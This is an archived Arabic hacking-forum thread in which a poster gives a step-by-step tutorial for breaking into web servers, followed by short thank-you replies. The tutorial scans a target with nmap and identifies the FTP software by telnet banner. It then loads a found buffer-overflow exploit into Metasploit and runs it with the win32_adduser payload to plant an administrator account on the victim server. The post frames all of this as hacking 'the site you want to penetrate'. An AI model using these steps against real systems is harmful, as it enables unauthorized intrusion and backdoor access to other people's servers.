:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت (http://www.vbspiders.com/vb/t1311.html)

BlueHacker 06-08-2008 04:40 PM

شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت
 
بسم الله الرحمن الرحيم

السلام عليكم و رحمة الله و بركاته

أقدم لكم شرح الاختراق المتقدم

و هي طريقة الأختراق الأحترافيه


طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند.....

و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه

و اللي منها طريقتنا اليوم و هي الأختراق عن طريق البرامج المركبه على السيرفر أو الموقع

حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع

ول من لم يظهر له الشرح فليحمله من هنا :

تحميل الشرح مع الصور بصيغة HTML

اللي راح تتعلمه من الشرح:-
1-استخدام أداة Nmap الشهيره.
2-التعامل مع أداة M e t a s ploit.
3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا.

متطلبات الشرح:-
1-أداة Nmap

2-أداة M e t a spliot

لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت


نبدأ الشرح على بركة الله

http://www.vbspiders.com/imagesup/nmap1.jpg


أمر البحث

nmap -P0 http://www.site.com/

مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/

و زي ما نشوف البرامج المركبه على الموقع مع المنافذ

الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره))

ابدأ=>تشغيل=>telnet

http://www.vbspiders.com/imagesup/nmap2.jpg

نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21

21 منفذ الــFTP

http://www.vbspiders.com/imagesup/nmap3.jpg

هنا طلع لنا اسم البرنامج

الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه

FTP port 21 Buffer Overflow Exploit

و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا

بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره

http://www.vbspiders.com/imagesup/nmap4.jpg

هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm

تاخذ الثغره للمسار هذا

C:\Program Files\M e t a sploit\Framework2\home\framework\exploits

و تروح الأن و تفتح أداة الميتا بالذهاب للمكان اللي ثبت الاداة فيه

راح تلقاها باسم msfconsole.exe

http://www.vbspiders.com/imagesup/nmap5.jpg

show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج


http://www.vbspiders.com/imagesup/nmap6.jpg

http://www.vbspiders.com/imagesup/nmap7.jpg

use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)

http://www.vbspiders.com/imagesup/nmap8.jpg

show options أمر اظهار الخيارات

RHOST = الموقع
RPORT = المنفذ

أهم شئ هو الموقع أما المنفذ ماهو لازم

http://www.vbspiders.com/imagesup/nmap9.jpg

set RHOST http://www.site.com/ امر اظافة الموقع

و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ

http://www.vbspiders.com/imagesup/nmap10.jpg

show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره

و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه

http://www.vbspiders.com/imagesup/nmap11.jpg

set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره

الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي

set PASS viros اضافة الباسوورد viros
set USER viros اضافة اليوزر viros

http://www.vbspiders.com/imagesup/nmap12.jpg

اظهار الخيارات و راح نشوف ان المعلومات انحفظت

http://www.vbspiders.com/imagesup/nmap13.jpg

exploit أمر الأستغلال و زي ما راح تشوفون ان فيه كلام راح يطلع زي اللي بالصوره و ان شاء الهل الثغره تظبط

و بعد ما ينسجل حساب الرووت تروح تتصل بالسيرفر بأي برنامج اتصال زي برنامج putty سوف يتم شرحه باذن الله

========================

و الى هنا نكون وصلنا لنهاية الشرح

أتمنى ان الشرح كان واضح

و اذا فيه أي خطأ سامحوني عليه لان الأنسان غير معصوم من الخطأ

و في الختام تقبلوا تحياتي

bLuEhAcKeR

دمتم في حفظ الرحمان


KiLlUa_HaCkErS 06-09-2008 11:04 AM

مشكووووووور

MrXRoMaNcE1 06-10-2008 10:42 AM

مشكككور واكتر من رائع الى الامام تقبل مروري

The Final Doom 06-12-2008 11:23 AM

شــرح ولا اروع اخوي الهكر الازرق جزاك الله خيرا

" TiTo " 06-14-2008 11:11 PM

بطل

IzRi-InO 06-15-2008 02:50 AM

مشكوور كثير على شرح

Crazy Dz 06-28-2008 04:40 PM

بارك الله فيك

hacker_alchamal 08-12-2008 03:30 AM

مشكور بطل

Admin killer 08-15-2008 02:53 PM

شكرا يا قبو وياريت تحط شرح بالصور لتثبيت ال m e t a sploit على لينكس

وشكرا مرة ثانيةبطل

Admin killer 08-15-2008 02:53 PM

شكرا يا قبو وياريت تحط شرح بالصور لتثبيت ال m e t a sploit على لينكس

وشكرا مرة ثانيةبطل

MR.hak 08-15-2008 08:03 PM

شكراشكراشكراشكراشكراشكرالوول

Des Boy 08-15-2008 09:56 PM

شكراشكراشكراشكراشكراوالله

بندر البطران 09-18-2008 10:44 PM

مشكور وماقصرت اخوي

Hacking ghost 09-19-2008 10:37 AM

من الممكن تعمل شرح للـــ framework 3 و رح اكون مشكووور .

king al-arab 11-03-2008 02:55 PM

رًٍٍَِوًٍَِعًًٍٍَِهًًٍَِِ يًٍَِآًٍَِبًًٍَِطلًًٍٍٍَََِ تًًٍَِِسًٍٍَِلًًٍٍَِمًًًٍََِ يًًٍَِمًٍََِِيًًٍٍَِنًٍََِكًًٍَِِ


الساعة الآن 07:51 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0